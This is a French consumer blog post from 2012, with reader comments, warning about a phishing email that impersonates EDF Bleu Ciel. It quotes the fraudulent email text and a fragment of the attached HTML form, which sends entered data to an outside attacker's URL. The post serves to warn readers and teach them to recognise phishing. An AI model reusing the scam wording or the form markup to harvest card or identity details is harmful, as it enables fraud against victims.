Phishing EDF bleu ciel

Posté par: Dan74

J’ai reçu hier soir (19/09/2012) une tentative de phishing EDF bleu ciel.

Pour rappel le phishing est un procédé qui concerne à tenter d’obtenir vos numéros de carte bleu, carte d’identité, etc, afin d’alléger votre compte bancaire l’air de rien.

Bien entendu ne répondez jamais à ce genre d’email, faites le suivre à EDF et effacez-le.

L’email

——————————————————————————-

Cher(e) Cleint(e),
Nous avons constatés un impayé sur votre dernière facture.

s’il vous plait suivez ces deux étapes simples.

(1) Téléchargez la pièce jointe fournie par notre équipe de sécurité.
(2) Ouvrez le fichier joint (dans votre navigateur Web) et de remplir le besoin domaines.

Lors d’ échec du règlement, La société EDF vous avise que le service d’énergie sera suspendu à compter du : 08 octobre pour redevance non payée.
Cette intervention vous sera facture

Cordialement

——————————————————————————-

Décortiquons cela:

A cet e-mail est joint un fichier html qui s’ouvre dans votre navigateur Internet et pour brouiller les pistes, l’URL (adresse Internet) n’est pas celle d’un site mais celle d’une page qui s’ouvre directement depuis votre ordinateur.

C:\Users\Dan\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\I5DGP81O\UG85490013.html

Avec un joli formulaire nécessaire pour pouvoir vous « plumer »

Si on analyse le code sur Internet explorer par exemple (Menu Affichage => source), on obtient des informations intéressantes sur l’auteur du méfait.

On recherche la syntaxe <form method, et une vraie URL Internet, ici: http://anas120.com/index122.php

<a style= »font: 14px Tahoma; text-decoration:none; COLOR: #0000FF »>Veuillez remplir le formulaire suivant :</a><br>
<form method= »post » action= »http://anas120.com/index122.php » name= »formulaire » onsubmit= »return validation(); »>
<table style=’padding:10px; border-width: 1px; border-style: solid; border-color: #C4CDE0; -moz-border-radius: 4px; -webkit-border-radius: 2px; border-radius: 2px;’ border= »0″ cellspacing= »4″ width= »560″>

Ce que vous avez entré comme informations sera envoyé sur ce site, le contrevenant n’a plus qu’à récupérer les informations et se commander une Porche dans une boutique en ligne quelconque avec votre carte bleue…

Dans le cas ci-dessus nous arrivions sur une autre page qui nous demandait de télécharger une image de votre carte bleue et d’une pièce d’identité. Malheureusement ou heureusement, la page n’est déjà plus active car il y a du avoir un signalement d’effectué.

La dernière étape et le renvoie vers la page officielle d’EDF.

Ce procédé est utilisé pour de nombreux cas:

Services publics
Banques
Fournisseurs d’accès Internet
etc…

Alors soyez vigilants et ne vous faites pas piéger.

Daniel Delevoye

19
SEP
2012

Desca novembre 28, 2012

Mais comment être sur du site où l’on se trouve quand on tape son numéro de carte bancaire sur un site marchand?
Prenons cet exemple réel:
J’ai été chercher un livre sur le site « amazone ». Le livre était à plus de 20€, j’ai renoncer à l’acheter tout de suite. Mais lorsque j’ai éffectuer ma recherche sur ce bouquin, je sais que des tas de programmes on scanné ma démarche et ont retenu que je m’intéressais à ce livre. Je le sais car chaque fois que j’observe un article sur un site marchand, je suis harceler de pub ciblée sur ce type d’article pendant des semaine sur google, g-mail, face book et plein d’autre site.
Ce matin je reçois un courriel publicitaire qui me présente le livre que je cherchais pour 5,70€ ! La pub ciblé à bien fait son boulot: je suis tout de suite très intéressé! Je clic sur le lien qui me renvoie sur une page du site Amazone, avec en effet la super promo sur le bouquin. Donc j’achète. Je donne mon numéro de carte bleu et je commande (en réalité je n’ai pas taper mon numéro car le site amazone a retenu mes coordonné bancaire depuis ma dernière commande. Je n’ai qu’a cliquer sur « ok ». la même situation aurais pu se produire sans avoir mémoriser mes coordonnées). Comment savoir si je suis bien sur le vrai site « Amazone » et non pas sur une copie du site mise en ligne par des pirates? Si les sites commerciaux scannent mes recherches d’achat, n’importe quel pirate peut faire de même et m’envoyer un courriel qui me vente une super promo sur un produit convoité, m’envoyer sur un faux site et me réclamer mes coordonées banquaire…
répondre
- Dan74 décembre 10, 2012
  
  Quand on va sur un site connu, l’adresse du site est sous cette forme http://www.banque.fr
  Les sites contrefaits peuvent avoir ce genre d’adresse: http://www.tatempion.com/stockage/banque/
  
  On constate que l’on est pas à la racine du site mais dans un sous dossier.
  Bien entendu, les escrocs peuvent acheter un nom de domaine pour effectuer leur méfait: http://www.ma-banque.fr , il faut donc rester très vigilant.
  répondre
Desca janvier 23, 2013

OK! Restons sur nos gardes.
répondre
budgetsanssepriver.com février 14, 2013

Moi aussi j’ai failli faire les frais d’une tentative d’hameçonnage internet par mail fraude edf arnaque à la facture,
sans être un Bernard Pivot de l’orthographe, il est facile de vérifier les faux avis de coupure Edf phishing. A signaler, la plupart des liens du site phishing Edf sont brisés (contact, mentions légales, plan du site, différentes rubriques…).
Les seuls champs actifs sont ceux du formulaire de saisie de la carte bleue !

La méthode de phishing facture bleu ciel EDF ? comme en marketing direct on stress le client de répondre sous peine de se voir couper la ligne dès la première relance.

Evitez le phishing Edf grace à la fonction anti-spam de votre logiciel anti-virus…

http://budgetsanssepriver.com/blog/stop-bloquer-pub-courriers-depenses-factures-detaillees-anti-spam-e-mail-pop-up/
répondre